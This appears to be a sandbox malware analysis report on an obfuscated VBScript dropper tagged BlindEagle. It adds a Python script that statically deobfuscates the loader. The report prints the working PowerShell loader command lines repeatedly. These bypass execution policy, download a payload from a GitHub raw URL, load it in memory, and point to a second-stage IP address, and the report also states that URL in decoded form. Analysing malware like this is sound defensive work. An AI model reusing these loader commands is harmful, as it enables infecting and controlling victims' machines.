

Windows Analysis Report
uLfuBVyZFV.vbs

Overview

General Information

Sample name: uLfuBVyZFV.vbs (renamed because the original name is a hash value)
Original sample name: 79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a.vbs
Analysis ID: 1523829
MD5: 123316fb7db9c910bd92a9ad7e7bbdbc
SHA1: 43dbabc790f0a0e20b397ad707bb33cb77004998
SHA256: 79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a
Tags: BlindEagle, vbs, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6644 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
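The three entries in the process tree above are the whole loader chain. PID 2980 base64-decodes a payload and passes it to a second powershell.exe as its `-command` argument. PID 7304 spells `iex` out of `$env:COMSPEC[4,15,25]`, rebuilds its script from `'+'`-concatenated fragments, and swaps the placeholders `UNI`, `hPI` and `sBO` back into `'`, `"` and `$` with a `-creplace`/`-replace` chain. The recovered script downloads a base64 text blob from the raw.githubusercontent.com URL, loads it as a .NET assembly with `[Reflection.Assembly]::Load`, and calls `[dnlib.IO.Home]::VAI` with a backwards-written URL as its first argument. The Python below undoes those layers statically; it is an added example, not part of the report or of Joe Sandbox. It embeds the PID 7304 command verbatim from the tree and only the first 44 characters of the base64 blob, assumes the sandbox VM had the default `%COMSPEC%` value, and fetches nothing. What the remaining `VAI` arguments control is not established by the report.

```python
"""Static unwrapping of the PowerShell obfuscation layers in the process tree
above. Nothing here executes PowerShell: each layer is undone with string
operations only, so it is safe to run against the raw command lines."""
import base64
import re

# Default %COMSPEC% on a stock Windows install (assumption: the sandbox VM used
# the default). The loader indexes into it to spell a cmdlet alias.
COMSPEC = r"C:\Windows\system32\cmd.exe"

# Layer 1 (PID 2980): only the first 44 base64 characters of the blob quoted in
# the Sigma match data are embedded here; the full blob is on the page.
OUTER_B64_PREFIX = "LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycp"

# Layer 2 (PID 7304): the decoded command copied verbatim from the process tree,
# without the surrounding double quotes of the -command argument.
INNER_CMD = r""". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"""


def decode_outer_layer(b64: str) -> str:
    """Layer 1: what [Convert]::FromBase64String + UTF8.GetString yield in the
    parent powershell.exe. .NET insists on '=' padding; restore it if lost."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-8")


def resolve_comspec_indexing(cmd: str, comspec: str = COMSPEC) -> str:
    """Replace each `( $env:COMSPEC[i,j,k] -join '' )` with the characters it
    selects; indices 4,15,25 of the default value spell 'iex'."""
    pattern = re.compile(
        r"\(\s*\$env:comspec\[([\d,\s]+)\]\s*-join\s*''\s*\)", re.IGNORECASE)

    def spell(m):
        return "".join(comspec[int(i)] for i in m.group(1).split(","))

    return pattern.sub(spell, cmd)


def unwrap_concat_and_replace(expr: str) -> str:
    """Layer 2 body: join the single-quoted fragments of an 'a'+'b'+... expression,
    then apply the trailing -creplace/-replace chain left to right. Both operators
    take a regex pattern; -creplace is case-sensitive, -replace is not."""
    split = re.search(r"\)\s*-c?replace\s", expr, re.IGNORECASE)
    body, chain = (expr, "") if split is None else (expr[:split.start()], expr[split.start():])
    # '' inside a single-quoted PowerShell string is an escaped single quote
    frags = re.findall(r"'((?:[^']|'')*)'", body)
    text = "".join(f.replace("''", "'") for f in frags)
    op_re = re.compile(
        r"-(c?)replace\s+(?:'([^']*)'|\(((?:\[char\]\d+\+?)+)\))\s*,\s*\[char\](\d+)",
        re.IGNORECASE)
    for case_sensitive, literal, char_expr, repl_code in op_re.findall(chain):
        pattern = literal or "".join(chr(int(n)) for n in re.findall(r"\d+", char_expr))
        repl = chr(int(repl_code))
        flags = 0 if case_sensitive else re.IGNORECASE
        text = re.sub(pattern, lambda _m, r=repl: r, text, flags=flags)
    return text


def recover_reversed_strings(script: str) -> list:
    """Layer 3: string arguments written backwards. Return each double-quoted
    argument that reads as a URL once reversed (here, the stage-2 download)."""
    return [s[::-1] for s in re.findall(r'"([^"]*)"', script)
            if re.match(r"https?://", s[::-1])]


def deobfuscate(inner_cmd: str) -> str:
    """Layers 2 and 3 of the command handed to PID 7304, as iex would see it."""
    return unwrap_concat_and_replace(resolve_comspec_indexing(inner_cmd))


def summarize(script: str) -> dict:
    """IOCs and behaviours a triage note needs, pulled from the recovered script."""
    return {
        "stage1_urls": re.findall(r"https?://[^\s'\"]+", script),
        "reversed_urls": recover_reversed_strings(script),
        "static_calls": re.findall(r"\[([\w.]+)\]::(\w+)\(", script),
        "in_memory_assembly_load": "[Reflection.Assembly]::Load(" in script,
    }


if __name__ == "__main__":
    print(decode_outer_layer(OUTER_B64_PREFIX))
    recovered = deobfuscate(INNER_CMD)
    print(recovered)
    for key, value in summarize(recovered).items():
        print(f"{key}: {value}")
```

Reversing the first `VAI` argument gives `http://198.46.129.134/450/LDBRR.txt`. That value is derived from the command line, not from observed traffic: the AV Detection section below lists only the GitHub first-stage URL, and whether the sandbox reached the second host is not shown in this excerpt. Note also that `-creplace` and `-replace` are regex replacements with different case handling; treating them as plain case-sensitive string substitution would still work on this sample but fails on loaders that rely on the case-insensitive variant.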
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 2980 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
  • 0x48c2f:$b3: ::UTF8.GetString(
  • 0x509cf:$b3: ::UTF8.GetString(
  • 0x50d49:$b3: ::UTF8.GetString(
  • 0x51ce6:$b3: ::UTF8.GetString(
  • 0x6d631:$b3: ::UTF8.GetString(
  • 0x720c7:$b3: ::UTF8.GetString(
  • 0x726b5:$b3: ::UTF8.GetString(
  • 0xa544e:$b3: ::UTF8.GetString(
  • 0xa5a3c:$b3: ::UTF8.GetString(
  • 0xc3880:$b3: ::UTF8.GetString(
  • 0xc3fc3:$b3: ::UTF8.GetString(
  • 0xc4a0e:$b3: ::UTF8.GetString(
  • 0xc5003:$b3: ::UTF8.GetString(
  • 0xc57aa:$b3: ::UTF8.GetString(
  • 0xc5f4a:$b3: ::UTF8.GetString(
  • 0xc672d:$b3: ::UTF8.GetString(
  • 0xc6da1:$b3: ::UTF8.GetString(
  • 0xc76cf:$b3: ::UTF8.GetString(
  • 0xc8f6b:$b3: ::UTF8.GetString(
  • 0xc9943:$b3: ::UTF8.GetString(
  • 0xca0e6:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 7304 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
  • 0x1e7fd7:$b2: ::FromBase64String(
  • 0x1eb230:$b2: ::FromBase64String(
  • 0x1eb408:$b2: ::FromBase64String(
  • 0x1eb5e0:$b2: ::FromBase64String(
  • 0x144903:$s1: -jOiN
  • 0x144d31:$s1: -jOiN
  • 0x148fc6:$s1: -jOiN
  • 0x151547:$s1: -jOiN
  • 0x1bbf0a:$s1: -jOiN
  • 0x1beb62:$s1: -jOiN
  • 0x201c1f:$s1: -join
  • 0x23dcbe:$s1: -join
  • 0x24184c:$s1: -join
  • 0x26222a:$s1: -jOiN
  • 0x26265f:$s1: -jOiN
  • 0x262cd2:$s1: -jOiN
  • 0x2632c2:$s1: -jOiN
  • 0x2657b5:$s1: -join
  • 0x265972:$s1: -join
  • 0x4edef1:$s1: -jOiN
  • 0x4ee31f:$s1: -jOiN

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64Strin
Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnK
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnK
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnK
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64Strin
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\uLfuBVyZFV.vbs", ProcessId: 6644, ProcessName: wscript.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 